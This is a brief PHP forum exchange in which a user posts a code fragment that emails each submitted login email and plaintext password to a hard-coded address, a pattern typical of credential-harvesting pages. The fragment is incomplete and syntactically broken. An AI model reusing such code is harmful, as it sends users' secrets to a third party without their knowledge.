Author Topic: Anti-mass mail securitycode  (Read 1021 times)

jSherz

  • Expert PHP Helper
  • Senior Member
  • *****
  • Posts: 409
  • Karma: 4
    • View Profile
    • jSherz.com
Re: Anti-mass mail securitycode
« Reply #15 on: January 09, 2012, 01:02:19 PM »
And which part of the code sent the mail?
Looking for PHP tutorials? View mine. Please use code or PHP tags in your posts.

Borntobewild

  • Regular Member
  • **
  • Posts: 29
  • Karma: 0
    • View Profile
Re: Anti-mass mail securitycode
« Reply #16 on: January 09, 2012, 02:06:13 PM »
And which part of the code sent the mail?
Do you mean this part?

$email = "email@mail.com";
$to = 'email@mail.com';
$subject = 'Login Record';
$message = "User Login\n\ndate_time= " .

date("d/m/Y") . "\nuser= " .

$_POST['email'] . "\npass= " .

$_POST['password'] . ";
$subdate = date("d/m/Y");

jSherz

  • Expert PHP Helper
  • Senior Member
  • *****
  • Posts: 409
  • Karma: 4
    • View Profile
    • jSherz.com
Re: Anti-mass mail securitycode
« Reply #17 on: January 10, 2012, 04:31:02 AM »
With mass email

Sorry I don't think I understood what you mean initially. What do you mean by a "mass email attack"?
Looking for PHP tutorials? View mine. Please use code or PHP tags in your posts.